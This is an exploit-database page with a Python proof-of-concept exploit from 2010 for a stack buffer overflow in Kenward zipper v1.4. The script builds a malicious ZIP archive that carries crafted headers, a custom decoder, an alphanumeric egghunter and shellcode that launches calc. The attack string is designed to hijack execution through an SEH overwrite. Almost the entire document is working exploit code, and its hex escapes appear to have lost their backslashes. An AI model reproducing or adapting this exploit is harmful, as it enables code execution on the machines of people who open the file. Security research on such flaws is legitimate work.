Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit
# Published : 2010-03-22
# Author : mr_me
# Previous Title : VLC v0.8.6 [b][c][d][a] .ASS file buffer overflow exploit(win32 universal)
# Next Title : Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit
#!/usr/bin/python
# #################################################################################################
# Exploit Title : Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit
# Date          : 23/3/2010
# Bug found by  : corelanc0d3r (http://www.corelan.be:8800/)
# Author        : mr_me (http://net-ninja.net/)
# Software Link : http://www.trans4mind.com/personal_development/zipper/
# Version       : 1.4
# OS            : Windows
# Tested on     : XP SP3 En
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #################################################################################################
# http://www.abysssec.com/blog/2010/03/ken-ward-zipper-stack-bof-0day-a-not-so-typical-seh-exploit/
print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| ___/____/_/   ___/_/__,_/_/ /_/   __/___/__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@corelan.be |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "~~> Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit <~~"

ldf_header = ("x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00xe4x0fx00x00x00")

#central directory header
cdf_header = ("x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00x00xe4x0fx00x00x00x00x00x00x01x00x24x00x00"
"x00x00x00x00x00")

# end of central directory header
eofcdf_header = ("x50x4Bx05x06x00x00x00x00x01x00x01x00"
"x12x10x00x00x02x10x00x00x00x00")

# custom decoder
decoder = ("x25x4Ax4Dx4Ex55"   
"x25x35x32x31x2Ax2dx55x55"
"x55x5fx2dx56x55x56x5fx2d"
"x55x55x55x5ex50x25x4Ax4D"
"x4Ex55x25x35x32x31x2Ax2d"
"x2bx5bx39x54x2dx2ax5bx39"
"x54x2dx2ax5fx39x55x50")

# ascii egghunter
egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
"9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA");

# shellcode
calc = ("xd9xf7xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4ax48x51x54x45x50x43x30x45x50x4cx4bx51x55"
"x47x4cx4cx4bx43x4cx43x35x43x48x43x31x4ax4fx4c"
"x4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b"
"x50x49x4cx4bx46x54x4cx4bx43x31x4ax4ex50x31x49"
"x50x4ax39x4ex4cx4bx34x49x50x42x54x44x47x49x51"
"x49x5ax44x4dx45x51x49x52x4ax4bx4bx44x47x4bx50"
"x54x47x54x45x54x44x35x4dx35x4cx4bx51x4fx51x34"
"x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51"
"x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31"
"x4ax4bx4cx49x51x4cx46x44x43x34x48x43x51x4fx50"
"x31x4ax56x43x50x50x56x42x44x4cx4bx50x46x50x30"
"x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4c"
"x4bx42x48x45x58x4bx39x4ax58x4bx33x49x50x42x4a"
"x50x50x42x48x4cx30x4cx4ax44x44x51x4fx45x38x4a"
"x38x4bx4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43"
"x45x31x42x4cx43x53x46x4ex43x55x43x48x45x35x45"
"x50x41x41");

# chasing the stack....
align = "x61" * 67 + "x58x58x73xf9"

# ;)
name = "x6Dx72x5Fx6Dx65x73x5Fx70x61x73x73x77x6F"
"x72x64x5Fx63x6Fx6Cx6Cx65x63x74x69x6Fx6E"

print "[+] Building attack string..."

# my final attack string
exploit = name
exploit += "x43" * 266
exploit += egghunter
exploit += "x43" * (878-len(exploit))
exploit += "x54x5a"
exploit += decoder
exploit += "x73xf9"
exploit += "x44" * (67-len(decoder))
exploit += "x73xf9"
exploit += align
exploit += "x42" * (1022-len(exploit))
exploit += "x73xf9x41x41"
exploit += "x6dx26x44x00"
exploit += "x57x30x30x54"
exploit += "x57x30x30x54"
# when the ninja strikes the samurai, the emperor wore no clothes
exploit += calc
exploit += "x42" * (4064-len(exploit))
exploit += "x2ex74x78x74"

print "[+] Writing payload to cst-kenzip.zip"
# write the payload
mefile = open('cst-kenzip.zip','w');
mefile.write(ldf_header + exploit + cdf_header + exploit + eofcdf_header);
mefile.close()
print "[+] Exploit file created!!"